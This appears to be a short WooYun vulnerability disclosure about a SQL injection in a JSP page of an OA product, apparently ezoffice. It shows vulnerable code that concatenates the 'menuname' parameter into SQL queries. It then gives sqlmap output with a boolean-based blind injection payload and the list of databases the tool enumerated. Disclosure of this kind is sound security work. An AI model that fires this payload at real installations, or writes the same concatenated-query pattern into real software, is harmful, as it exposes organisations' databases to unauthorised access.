WooYun.org

<%
   String flag=request.getParameter("flag");
   String menuname = request.getParameter("menuname");
   if("sync".equals(flag)){
      //数据
	  String s_String = "";
	  int s_int = 0;
      String[][]  res = null;
	  DbOpt dbopt = null;
      try {
				  dbopt = new DbOpt();
				  String Sql = "";
				  Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname  from OA_MENUSET where menuname='"+menuname+"' ";
				  res = dbopt.executeQueryToStrArr2(Sql,18);
				  if(res != null){
                     String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");
					 s_int = Integer.parseInt(_cnt);
.......
					 }else if(s_int>1){
					   s_String = "查出"+s_int+"条数据，未处理！";
					 }
				  }
				  
				  dbopt.close();
			} catch (Exception e) {
			    e.printStackTrace();
			} finally {
			    try {
			        dbopt.close();
			    } catch (SQLException ex) {
			    }
			}
  %>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">
 <tr>
    <td><%=s_String%>&nbsp;</td>

web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: menuname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] ezoffice
[*] information_schema
[*] mysql